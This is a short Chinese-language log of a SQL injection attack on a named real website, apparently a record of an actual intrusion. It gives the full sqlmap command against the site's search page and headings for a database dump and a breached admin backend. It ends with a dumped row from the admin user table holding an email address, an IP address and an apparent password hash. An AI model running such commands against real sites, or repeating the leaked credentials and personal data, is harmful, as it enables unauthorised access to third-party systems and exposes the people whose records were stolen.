1 | sqlmap -u "http://www.stocambodia.com/search.php?act=detail&bglxid=972%E9%8E%88%27%22%5C%28&cc=4111111111111111%2C&city=&country=NSW%E6%96%B0%E5%8D%97%E5%A8%81%E5%B0%94%E5%A3%AB%E5%B7%9E&czcc=1&gg=1%2C&js=1%2C&kk=1%2C&weight=1%2C&youbian=" -p bglxid -D shentong --tables --batch |
渗透测试第一部:数据暴库
1 | --- |
记录数据多的数据库:
1 | Database: shentong |
后台攻破:
后台数据表:ecs_admin_user
1 | admin1,<blank>,<blank>,1259,525999955@qq.com,0,0,<blank>,2331,96.9.88.251,1634947229,<blank>,331b05b18d04030e9b900c00553d497a,NULL,<blank>,<blank>,0,admin1,1635709960," |